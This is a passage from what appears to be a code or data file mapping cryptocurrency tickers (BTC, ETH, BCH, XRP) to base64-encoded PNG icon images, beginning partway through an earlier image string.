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',
'BTC': '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',
'ETH': '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',
'BCH': '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',
'XRP': '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',
